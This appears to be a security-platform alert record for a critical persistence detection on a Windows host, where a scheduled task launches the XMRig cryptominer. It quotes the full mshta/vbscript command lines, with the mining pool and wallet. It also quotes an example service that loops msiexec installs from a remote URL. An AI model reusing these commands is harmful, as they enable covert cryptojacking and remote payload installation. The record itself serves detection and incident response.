Persistent Creation of a Windows Scripting Host Automation Object

Details

Status:
Status Reason:
None
First Activity:
2024/03/06 12:16:59 UTC (22 days ago)
Last Activity:
2024/03/06 12:16:59 UTC (22 days ago)
Inserted At:
2024/03/06 12:29:24 UTC (22 days ago)
First Investigated:
2024/03/06 17:28:42 UTC (22 days ago)
First Resolved:
2024/03/15 18:22:04 UTC (13 days ago)
Severity:
Critical (0.99)
Threat Score:
9.9
Tenant:
Smiths Cogwheels, Inc. (96072)
Detector:
Taegis Watchlist
Tactics:
Execution, Persistence, Privilege Escalation, Defense Evasion
Sensor Types:
Taegis
Confidence:
100%
Hostname:
Agent/Sensor ID:
Investigations:
2024-03-06 - [CS] Crypto Mining Investigation - PCUS0382
Occurrence Count:
1
Grouped by (Group Key):
96072:app:event-filter:persistence:12a44d4a-d3f2-4a27-a8fa-e34b2f4967a1:432988c18aef458a8a8a95f56a98eba6:[mshta vbscript:CreateObject("Wscript.Shell").("C:\Users\brandon.perry\xmrig.exe --donate-level 1 -o monerohash.com:2222 -u 84XFxjQVYoJjQBeyfbcYBgJ1tw4cgywGyTp12nQw3mSKZctgMYuPGRH1y2LuBAS8yyT8ZX2NDS3CXbfFAxdXQJwAGMoMDSq -p x -k",0,true)(window.close)]:2024-02-29

Affected Agents  (1)

PCUS0382
Last Updated:
2024/03/28 07:17:16 UTC
OS Distributor:
Microsoft
OS Family:
WINDOWS
OS Version:
Windows 10
Most Recent Address:
172.16.20.11 

Open alerts (0) for Related Entities

Open alerts within past 72 hours from alert creation
NO DATA
Agent/Sensor ID (432988c18aef458a8a8a95f56a98eba6)
0
Hostname (PCUS0382)
0
Similar Alert Titles based on Rule ID (12a44d4a-d3f2-4a27-a8fa-e34b2f4967a1)
0

Closed alerts (99) for Related Entities

Closed alerts within past 30 days from alert creation
True Positive Malicious (55) / Suppressed (44)
Agent/Sensor ID (432988c18aef458a8a8a95f56a98eba6)
24
2
26
Hostname (PCUS0382)
30
42
72
Similar Alert Titles based on Rule ID (12a44d4a-d3f2-4a27-a8fa-e34b2f4967a1)
1
1

Open or closed investigations (6) for Related Entities

Open or closed investigations within past 30 days
File (mshta)
2
Host (432988c18aef458a8a8a95f56a98eba6)
2
Task Name (MSOFFICEER)
2
Alert Description
Counter Threat Unit™
A persistence event associated with a Windows Scripting Host Automation Object being created was identified. This may indicate that an adversary is attempting to frequently execute malicious content. Example:
Service Name: SMMq
Display Name: SMMq
Description:
Type: SERVICE_WIN32_OWN_PROCESS
Start Type: SERVICE_AUTO_START
Image Path: mshta.exe vbscript:createobject("wscript.shell").run("Cmd.exe /c for /l %i in (1 1 66) do (Msiexec /i Hxxp://Gk.Vwxqv.Xyz/SMB1.jpg /Q)",0)(window.close)

External References

First Event Details

Persistence

SCHEDULED_TASK mshta vbscript:CreateObject("Wscript.Shell").("C:\Users\brandon.perry\xmrig.exe --donate-level 1 -o monerohash.com:2222 -u 84XFxjQVYoJjQBeyfbcYBgJ1tw4cgywGyTp12nQw3mSKZctgMYuPGRH1y2LuBAS8yyT8ZX2NDS3CXbfFAxdXQJwAGMoMDSq -p x -k",0,true)(window.close)

Event Time:
2024/03/06 12:16:59 UTC · 22 days ago
Ingest Time:
2024/03/06 12:29:15 UTC · 22 days ago
Category:
SCHEDULED_TASK
Operation:
ADDED
Hostname:
PCUS0382
Sensor ID:
432988c18aef458a8a8a95f56a98eba6
Tenant:
(96072)